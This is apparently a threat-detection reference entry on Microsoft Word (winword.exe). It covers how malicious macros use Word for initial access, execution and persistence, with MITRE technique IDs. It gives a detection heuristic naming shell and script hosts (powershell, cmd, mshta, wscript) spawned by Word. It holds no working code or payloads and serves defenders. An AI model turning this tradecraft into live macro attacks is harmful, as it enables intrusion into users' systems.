winword.exe

winword.exe is the Word application. It opens and edits documents (.doc, .docx, .docm, .rtf), and through Visual Basic for Applications (VBA) those documents can carry macros, code that runs inside Word. Word is part of Microsoft Office, so the genuine binary is installed under C:\Program Files\Microsoft Office (or the (x86) path), not in a Windows system folder, and is signed by Microsoft.

Legitimately, winword.exe is opened by users to read and write documents, parented by explorer.exe or launched from Outlook or a browser. Editing a document is unremarkable. Word starting another program is not.

winword.exe is a top initial-access and execution vector (T1204.002). A user is convinced to open a document and a VBA macro runs Word's payload, often a short script that downloads and launches the next stage (T1059.005). The recognizable evidence is Word spawning a shell or script host: winword.exe as the parent of powershell.exe, cmd.exe, mshta.exe, or wscript.exe is one of the most reliable signs of a malicious document.

Word is also a persistence surface (T1137). Macro-enabled templates like the global Normal.dotm, and Word add-ins registered to load at startup, run attacker code every time Word opens. New or unexpected entries in Word's template and add-in locations warrant review. Because Word itself is legitimate, the children it spawns, the network it touches, and changes to its startup items are what separate ordinary editing from compromise.